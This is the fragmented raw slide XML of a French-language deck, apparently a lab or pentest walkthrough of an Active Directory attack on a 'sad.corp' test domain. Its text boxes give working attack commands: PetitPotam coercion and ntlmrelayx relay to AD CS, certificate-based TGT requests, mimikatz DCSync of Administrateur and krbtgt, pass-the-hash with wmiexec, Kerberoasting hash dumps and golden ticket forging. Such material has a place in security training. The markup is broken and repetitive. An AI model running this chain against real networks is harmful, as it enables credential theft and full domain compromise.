            <a:off x="-4935657" y="-57150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B1A60BBA-098A-C7EB-9AE7-11A065240354}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="152246" y="-1790592"/>
            <a:ext cx="5491605" cy="15335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python3 ntlmrelayx.py -t http://192.168.229.153/certsrv/certfnsh.asp -smb2support --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adcs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template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KerberosAuthentication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1" name="Image 40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1CAF4045-B31D-8E3E-B8C1-0777EABFD3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77" y="-1773158"/>
            <a:ext cx="935552" cy="296413"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
        </p:spPr>
      </p:pic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D298D3F0-0672-601E-D943-A0114544F1A1}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="-6148412" y="1897007"/>
            <a:ext cx="5924550" cy="145351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Import-module .\Find-PotentiallyCrackableAccounts.ps1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Import-Module .\Get-TGSCipher.ps1`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7" name="Image 46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B161D01C-97DE-A23E-50B2-EB307B6982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472" y="1983029"/>
            <a:ext cx="935552" cy="296413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4134FD4-B425-A445-2704-1DCB5A91893F}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="-6148412" y="3614955"/>
            <a:ext cx="5741859" cy="976866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Find-PotentiallyCrackableAccounts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FullData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Verbose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9" name="Image 48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F077198F-FC78-097D-D710-BBF5FEA1C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7745" y="3626032"/>
            <a:ext cx="909483" cy="288153"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
        </p:spPr>
      </p:pic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6C6CA27B-E6E8-A985-9934-6EF32D9B7589}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="-5839867" y="1949962"/>
            <a:ext cx="5491605" cy="15335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python3 ntlmrelayx.py -t http://192.168.229.153/certsrv/certfnsh.asp -smb2support --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adcs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template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KerberosAuthentication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3" name="Image 52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360CAE18-CEA1-3F5A-00EE-03E7D5CC9D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882" y="2039756"/>
            <a:ext cx="761453" cy="241252"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
        </p:spPr>
      </p:pic>
      <p:pic>
        <p:nvPicPr>
          <p:cNvPr id="54" name="Image 5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A556240-8AFF-87BB-5D2A-69324C63F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36" y="7136128"/>
            <a:ext cx="6253844" cy="2616798"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
        </p:spPr>
      </p:pic>
      <p:pic>
        <p:nvPicPr>
          <p:cNvPr id="55" name="Image 5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0FCC8B47-E8FD-D1DB-868C-183577A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8993" y="1352989"/>
            <a:ext cx="5338964" cy="51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5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503A44E-A5C6-E710-4BF2-78D3B3784EB6}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="324996" y="-2863403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Kerberoasting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B5B5D60-8BB2-8F51-7151-6BBE6FD93986}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="6873280" y="14560594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96EC070-AB98-1333-AA38-E2FE77448B6F}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="6873280" y="16326676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5CF8B22-ED29-BE95-DA54-C3B125F0CE12}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="6873280" y="12449850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pic>
        <p:nvPicPr>
          <p:cNvPr id="30" name="Picture 133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75375A71-9727-4D1E-2AAE-5A143B08F4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1817" y="7148063"/>
            <a:ext cx="10798541" cy="1717948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FDEC18F-B228-E139-D0DC-F772EE08616D}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="324995" y="192989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17B77E9-BE31-2526-B77C-4795351EF453}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="324995" y="2140371"/>
            <a:ext cx="5491605" cy="15335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python3 ntlmrelayx.py -t http://192.168.229.153/certsrv/certfnsh.asp -smb2support --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adcs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template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KerberosAuthentication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Image 3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4B380779-27C4-B464-B35B-54AAB51CF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80" y="2230165"/>
            <a:ext cx="761453" cy="241252"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
        </p:spPr>
      </p:pic>
      <p:pic>
        <p:nvPicPr>
          <p:cNvPr id="5" name="Image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34CC1F38-73DB-6DA7-AE79-559188423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95" y="3822102"/>
            <a:ext cx="6253844" cy="261679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56B2A40-2402-CDE7-F242-33E492F04649}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="5997832" y="238263"/>
            <a:ext cx="6048375" cy="6572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python3 PetitPotam.py 192.168.229.152 192.168.229.146</a:t>
            </a:r>
            <a:endParaRPr lang="fr-FR" sz="110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8" name="Image 7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22E41903-C887-96B6-48F2-93DAC1A0F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71" y="254727"/>
            <a:ext cx="761453" cy="241252"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
        </p:spPr>
      </p:pic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CF0E714B-9F54-9353-E5C0-417B3A3B0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243" y="1392933"/>
            <a:ext cx="5338964" cy="5122392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9578571-140F-9CD3-64C7-B2C0C05FE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32461" y="2240628"/>
            <a:ext cx="5757383" cy="4365635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9BFCF72-268D-2DF7-98C4-2C23A37079C2}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="4987980" y="-1086884"/>
            <a:ext cx="3438525" cy="8858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base64 /input:on</a:t>
            </a:r>
            <a:endParaRPr lang="fr-FR" sz="110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2" name="Image 1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DFA94696-0D5B-DDB2-7555-B4D76C76A5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7" t="3037"/>
          <a:stretch/>
        </p:blipFill>
        <p:spPr bwMode="auto">
          <a:xfrm>
            <a:off x="12936850" y="1065468"/>
            <a:ext cx="4063365" cy="1634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589937F-3EF0-D2F0-C171-63B1ADDD444B}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="12581253" y="3026196"/>
            <a:ext cx="5924550" cy="1295400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tgt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::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ask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pfx:MIIRhQIBAzC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--[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snip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]--jG2cL0QeRonA== /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user:DC-PARENT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/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domain:sad.corp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ptt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1131305-2827-A953-79CE-58FCDBD57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1253" y="4671868"/>
            <a:ext cx="3709472" cy="2114792"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
        </p:spPr>
      </p:pic>
      <p:pic>
        <p:nvPicPr>
          <p:cNvPr id="15" name="Image 14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97CB99C9-2511-E490-9721-34102A181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555" y="3187748"/>
            <a:ext cx="761453" cy="241252"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
        </p:spPr>
      </p:pic>
      <p:pic>
        <p:nvPicPr>
          <p:cNvPr id="16" name="Image 15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8F14D80E-D55B-1BD0-CC54-D5BC606F2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52" y="-1024924"/>
            <a:ext cx="761453" cy="241252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FC2942B-6687-5BEA-B5C4-8111ABF1FDAE}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="-6199628" y="1914611"/>
            <a:ext cx="5924550" cy="1717948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en-US" sz="14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Get-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TGSCipher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-SPN "Service2/SRV-APPLICATIF.sad.corp:1434" -Format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Hashcat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| Out-File -Encoding utf8 C:\KALI_WINATK\TGS-HASH.txt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6" name="Image 25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2C238870-386D-2951-7E60-3A049E389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6688" y="2000633"/>
            <a:ext cx="935552" cy="2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83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503A44E-A5C6-E710-4BF2-78D3B3784EB6}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="324996" y="-2863403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Kerberoasting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B5B5D60-8BB2-8F51-7151-6BBE6FD93986}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="6873280" y="14560594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96EC070-AB98-1333-AA38-E2FE77448B6F}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="6873280" y="16326676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5CF8B22-ED29-BE95-DA54-C3B125F0CE12}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="6873280" y="12449850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FDEC18F-B228-E139-D0DC-F772EE08616D}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="324995" y="192989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17B77E9-BE31-2526-B77C-4795351EF453}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="-5701227" y="2140371"/>
            <a:ext cx="5491605" cy="15335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python3 ntlmrelayx.py -t http://192.168.229.153/certsrv/certfnsh.asp -smb2support --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adcs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template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KerberosAuthentication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Image 3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4B380779-27C4-B464-B35B-54AAB51CFE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3497" y="2240628"/>
            <a:ext cx="761453" cy="241252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56B2A40-2402-CDE7-F242-33E492F04649}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="5818629" y="-1865805"/>
            <a:ext cx="6048375" cy="6572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python3 PetitPotam.py 192.168.229.152 192.168.229.146</a:t>
            </a:r>
            <a:endParaRPr lang="fr-FR" sz="110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8" name="Image 7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22E41903-C887-96B6-48F2-93DAC1A0F0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51" y="-1865805"/>
            <a:ext cx="761453" cy="241252"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
        </p:spPr>
      </p:pic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CF0E714B-9F54-9353-E5C0-417B3A3B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710" y="1037851"/>
            <a:ext cx="5338964" cy="5122392"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
        </p:spPr>
      </p:pic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DF3A3A7-CC56-7624-5DDB-FFF9E2283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7" y="2140371"/>
            <a:ext cx="5757383" cy="4365635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37E34A80-48D2-E38F-617A-C703BA8D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7" y="7312550"/>
            <a:ext cx="5757383" cy="4365635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4D55A13-6E76-F7A5-28A3-665CA67FFE2F}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="4779645" y="192989"/>
            <a:ext cx="3438525" cy="8858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base64 /input:on</a:t>
            </a:r>
            <a:endParaRPr lang="fr-FR" sz="110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2" name="Image 11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211EBE7D-F313-B8BD-7F14-3FA30A7F7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05" y="224104"/>
            <a:ext cx="641350" cy="203200"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
        </p:spPr>
      </p:pic>
      <p:pic>
        <p:nvPicPr>
          <p:cNvPr id="13" name="Image 1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D065BBA-0954-C2CD-77E7-516768E4B8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" t="3037"/>
          <a:stretch/>
        </p:blipFill>
        <p:spPr bwMode="auto">
          <a:xfrm>
            <a:off x="6193472" y="1272643"/>
            <a:ext cx="4063365" cy="1634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C15C3DA-95B8-EB5E-A9D4-CAFDEF0C4877}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="6193472" y="3104772"/>
            <a:ext cx="5924550" cy="1295400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tgt::ask /pfx:MIIRhQIBAzC--[snip]--jG2cL0QeRonA== /user:DC-PARENT$ /domain:sad.corp /ptt</a:t>
            </a:r>
            <a:endParaRPr lang="fr-FR" sz="110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5" name="Image 14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6579844C-DF2A-EFF2-F085-A937712E6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969" y="3150858"/>
            <a:ext cx="641350" cy="203200"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
        </p:spPr>
      </p:pic>
      <p:pic>
        <p:nvPicPr>
          <p:cNvPr id="16" name="Image 1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83C9AE8-AAA5-BA2B-EF05-6E8D35BAE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068" y="4527961"/>
            <a:ext cx="3709472" cy="2114792"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
        </p:spPr>
      </p:pic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46E1CFD-08F1-BD90-11CC-67D8F724B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98947" y="3673896"/>
            <a:ext cx="3489325" cy="3222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63D7ADB-DF7E-7B7B-92AA-BB0994BFB2CB}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="76790" y="-1132023"/>
            <a:ext cx="4545686" cy="9620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lsadump::dcsync /domain:sad.corp /user:Administrateur</a:t>
            </a:r>
            <a:endParaRPr lang="fr-FR" sz="110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7" name="Image 26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4C794339-2948-2F68-C558-9AC34CF47E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26" y="-1069833"/>
            <a:ext cx="641350" cy="203200"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
        </p:spPr>
      </p:pic>
      <p:pic>
        <p:nvPicPr>
          <p:cNvPr id="28" name="Image 2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24CBE41-2AE8-00AE-6E87-6A301C52CD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8907" y="7144422"/>
            <a:ext cx="5760720" cy="480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E76F6B9-4541-6AF3-97B6-1DCE9686CCA0}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="5818629" y="-3587043"/>
            <a:ext cx="5924550" cy="1295400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python3 wmiexec.py -hashes:b4e62e446b9fe6d0ae3e699cc00703fd Administrateur@192.168.229.146</a:t>
            </a:r>
            <a:endParaRPr lang="fr-FR" sz="110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2" name="Image 31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327DC353-BE97-C614-1112-16B5E64C56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609" y="-3541323"/>
            <a:ext cx="64135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9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B5B5D60-8BB2-8F51-7151-6BBE6FD93986}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="6873280" y="14560594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96EC070-AB98-1333-AA38-E2FE77448B6F}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="6873280" y="16326676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5CF8B22-ED29-BE95-DA54-C3B125F0CE12}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="6873280" y="9848362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FDEC18F-B228-E139-D0DC-F772EE08616D}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="324995" y="192989"/>
            <a:ext cx="4297481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</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="fr-FR" sz="3600" b="1" dirty="0" err="1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Petipoptam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17B77E9-BE31-2526-B77C-4795351EF453}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="-5701227" y="2140371"/>
            <a:ext cx="5491605" cy="15335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python3 ntlmrelayx.py -t http://192.168.229.153/certsrv/certfnsh.asp -smb2support --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adcs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--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template</a:t>
            </a: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KerberosAuthentication</a:t>
            </a:r>
            <a:endParaRPr lang="fr-FR" sz="14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Image 3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4B380779-27C4-B464-B35B-54AAB51CFE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3497" y="2240628"/>
            <a:ext cx="761453" cy="241252"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
        </p:spPr>
      </p:pic>
      <p:pic>
        <p:nvPicPr>
          <p:cNvPr id="5" name="Image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34CC1F38-73DB-6DA7-AE79-55918842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15888" y="4047745"/>
            <a:ext cx="6253844" cy="2616798"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
        </p:spPr>
      </p:pic>
      <p:pic>
        <p:nvPicPr>
          <p:cNvPr id="6" name="Image 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4DF3A3A7-CC56-7624-5DDB-FFF9E2283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89" y="7312550"/>
            <a:ext cx="5757383" cy="4365635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4D55A13-6E76-F7A5-28A3-665CA67FFE2F}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="4786629" y="-1000629"/>
            <a:ext cx="3438525" cy="854710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base64 /input:on</a:t>
            </a:r>
            <a:endParaRPr lang="fr-FR" sz="110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2" name="Image 11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211EBE7D-F313-B8BD-7F14-3FA30A7F7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04" y="-889160"/>
            <a:ext cx="641350" cy="203200"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
        </p:spPr>
      </p:pic>
      <p:pic>
        <p:nvPicPr>
          <p:cNvPr id="13" name="Image 1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D065BBA-0954-C2CD-77E7-516768E4B8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" t="3037"/>
          <a:stretch/>
        </p:blipFill>
        <p:spPr bwMode="auto">
          <a:xfrm>
            <a:off x="12507186" y="1272643"/>
            <a:ext cx="4063365" cy="1634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C15C3DA-95B8-EB5E-A9D4-CAFDEF0C4877}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="12507186" y="3026196"/>
            <a:ext cx="5924550" cy="1295400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tgt::ask /pfx:MIIRhQIBAzC--[snip]--jG2cL0QeRonA== /user:DC-PARENT$ /domain:sad.corp /ptt</a:t>
            </a:r>
            <a:endParaRPr lang="fr-FR" sz="110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5" name="Image 14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6579844C-DF2A-EFF2-F085-A937712E6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683" y="3072282"/>
            <a:ext cx="641350" cy="203200"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
        </p:spPr>
      </p:pic>
      <p:pic>
        <p:nvPicPr>
          <p:cNvPr id="16" name="Image 15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83C9AE8-AAA5-BA2B-EF05-6E8D35BAE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284" y="7312550"/>
            <a:ext cx="3709472" cy="2114792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689D5CC-B56B-B814-22EE-B8942B9B37C1}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="374189" y="2186847"/>
            <a:ext cx="4545686" cy="9620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lsadump::dcsync /domain:sad.corp /user:Administrateur</a:t>
            </a:r>
            <a:endParaRPr lang="fr-FR" sz="110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2" name="Image 21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54E84310-568A-B069-FE34-B2C1659EDD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63" y="2278680"/>
            <a:ext cx="641350" cy="203200"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
        </p:spPr>
      </p:pic>
      <p:pic>
        <p:nvPicPr>
          <p:cNvPr id="25" name="Image 2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204E5D5-DB8C-096B-B8BE-884CA91B0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189" y="3284286"/>
            <a:ext cx="3489325" cy="3222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302C150-B48B-4C86-D1DA-8D09A044333A}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="5602556" y="355358"/>
            <a:ext cx="5924550" cy="1295400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python3 wmiexec.py -hashes:b4e62e446b9fe6d0ae3e699cc00703fd Administrateur@192.168.229.146</a:t>
            </a:r>
            <a:endParaRPr lang="fr-FR" sz="110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7" name="Image 26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1434C680-5EAF-A933-2315-F34C025BD0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36" y="401078"/>
            <a:ext cx="641350" cy="203200"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
        </p:spPr>
      </p:pic>
      <p:pic>
        <p:nvPicPr>
          <p:cNvPr id="28" name="Image 2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110F58-9FD0-CBBE-7EDF-0FD7EF4AC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6386" y="1783054"/>
            <a:ext cx="5760720" cy="480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Image 28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2A6EFAE-28EF-44DF-218E-B99672AF2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89" y="7312550"/>
            <a:ext cx="5757383" cy="4365635"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom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BD21FA9-DC0A-5394-1D70-E435575A0B06}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="113070" y="-2154248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3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689D5CC-B56B-B814-22EE-B8942B9B37C1}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="-4907730" y="2545183"/>
            <a:ext cx="4545686" cy="96202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lsadump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::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dcsync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domain:sad.corp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user:Administrateur</a:t>
            </a:r>
            <a:endParaRPr lang="fr-FR" sz="1100" dirty="0">
              <a:solidFill>
                <a:srgbClr val="FFFFFF"/>
              </a:solidFill>
              <a:effectLst/>
              <a:latin typeface="Montserrat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5" name="Image 2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204E5D5-DB8C-096B-B8BE-884CA91B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89024" y="3673896"/>
            <a:ext cx="3489325" cy="3222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 2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110F58-9FD0-CBBE-7EDF-0FD7EF4A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0" y="7446435"/>
            <a:ext cx="5760720" cy="480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80AF48E-1B86-1041-402C-7F7506EA6FEE}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="374189" y="478925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pic>
        <p:nvPicPr>
          <p:cNvPr id="8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3AC7F8D3-7458-8B08-05C0-381E2F3AF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882" y="739877"/>
            <a:ext cx="5029835" cy="4572635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BB26FF0-0896-FA44-66B6-780023D52B0E}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="250086" y="2093408"/>
            <a:ext cx="4545686" cy="2827600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C:\Users\WINATK\Downloads\mimikatz_trunk\x64</a:t>
            </a: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.\mimikatz.exe</a:t>
            </a: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lsadump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::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dcsync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/user :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krbtgt</a:t>
            </a:r>
            <a:endParaRPr lang="fr-FR" sz="9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2" name="Image 21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54E84310-568A-B069-FE34-B2C1659EDD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695" y="2545183"/>
            <a:ext cx="641350" cy="203200"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
        </p:spPr>
      </p:pic>
      <p:pic>
        <p:nvPicPr>
          <p:cNvPr id="10" name="Image 9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B16014B4-8C5F-17C8-59C8-9A3BDEEEE5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37" y="2202283"/>
            <a:ext cx="64135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51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110F58-9FD0-CBBE-7EDF-0FD7EF4A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0" y="7446435"/>
            <a:ext cx="5760720" cy="480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80AF48E-1B86-1041-402C-7F7506EA6FEE}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="374189" y="478925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pic>
        <p:nvPicPr>
          <p:cNvPr id="8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3AC7F8D3-7458-8B08-05C0-381E2F3AF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282" y="714477"/>
            <a:ext cx="5029835" cy="4572635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BB26FF0-0896-FA44-66B6-780023D52B0E}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="-4677514" y="2220408"/>
            <a:ext cx="4545686" cy="2827600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C:\Users\WINATK\Downloads\mimikatz_trunk\x64</a:t>
            </a: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.\mimikatz.exe</a:t>
            </a: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lsadump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::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dcsync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/user :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krbtgt</a:t>
            </a:r>
            <a:endParaRPr lang="fr-FR" sz="9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" name="Image 9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B16014B4-8C5F-17C8-59C8-9A3BDEEEE5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063" y="2329283"/>
            <a:ext cx="641350" cy="2032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F189C24-CD30-DD88-BB64-52B01B01E6E0}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="318559" y="1899953"/>
            <a:ext cx="4545686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whoami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/user</a:t>
            </a:r>
            <a:endParaRPr lang="fr-FR" sz="9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Image 2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F6D725DB-C607-8C70-2F84-41EB93AADC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41" y="2000431"/>
            <a:ext cx="641350" cy="203200"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
        </p:spPr>
      </p:pic>
      <p:pic>
        <p:nvPicPr>
          <p:cNvPr id="4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E343EFE5-6AE4-90D7-F680-F39390269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39" y="2835698"/>
            <a:ext cx="4505325" cy="13335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E89E462-7351-FC5B-1AFC-1A6970CFB275}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="318559" y="4242286"/>
            <a:ext cx="4545686" cy="94347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klist</a:t>
            </a:r>
            <a:endParaRPr lang="fr-FR" sz="11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dir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\\DC-PARENT\C$`</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:pic>
        <p:nvPicPr>
          <p:cNvPr id="6" name="Image 5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F1B26738-B262-4C13-E003-9DACC1C9E1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59" y="4275870"/>
            <a:ext cx="641350" cy="203200"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
        </p:spPr>
      </p:pic>
      <p:pic>
        <p:nvPicPr>
          <p:cNvPr id="11" name="Picture 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66D194-99B4-E02D-AB63-01897B4ED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78" y="5258849"/>
            <a:ext cx="4545686" cy="1507713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F51148A-3A6F-3335-EA16-411BB61B3688}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="6203864" y="478925"/>
            <a:ext cx="5384800" cy="812363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kerberos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::golden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domain:sad.corp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sid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:[SID_RECUPERE] /rc4:[HASH_NTLM_KRBTGT]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user:AtckAdmin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/id:500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ptt</a:t>
            </a:r>
            <a:endParaRPr lang="fr-FR" sz="11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3" name="Image 12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43B89A88-032D-D7D5-4CFF-DEACA7C8A6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4" y="511277"/>
            <a:ext cx="641350" cy="203200"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
        </p:spPr>
      </p:pic>
      <p:pic>
        <p:nvPicPr>
          <p:cNvPr id="14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5CC3AD42-158C-4ED3-5CE7-48A2432F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616" y="1367045"/>
            <a:ext cx="5760720" cy="2050415"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
        </p:spPr>
      </p:pic>
      <p:pic>
        <p:nvPicPr>
          <p:cNvPr id="15" name="Picture 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5BD1384C-0395-A16F-DAB7-210AEFB04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285" y="3502448"/>
            <a:ext cx="5150051" cy="3111489"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
        </p:spPr>
      </p:pic>
      <p:pic>
        <p:nvPicPr>
          <p:cNvPr id="17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C56AF4C-41D6-1295-48E2-B5D4098EB2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5" t="-62" r="1582" b="1241"/>
          <a:stretch/>
        </p:blipFill>
        <p:spPr bwMode="auto">
          <a:xfrm>
            <a:off x="2799080" y="6858000"/>
            <a:ext cx="5654040" cy="5445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9618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110F58-9FD0-CBBE-7EDF-0FD7EF4A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0" y="7446435"/>
            <a:ext cx="5760720" cy="480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80AF48E-1B86-1041-402C-7F7506EA6FEE}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="374189" y="478925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pic>
        <p:nvPicPr>
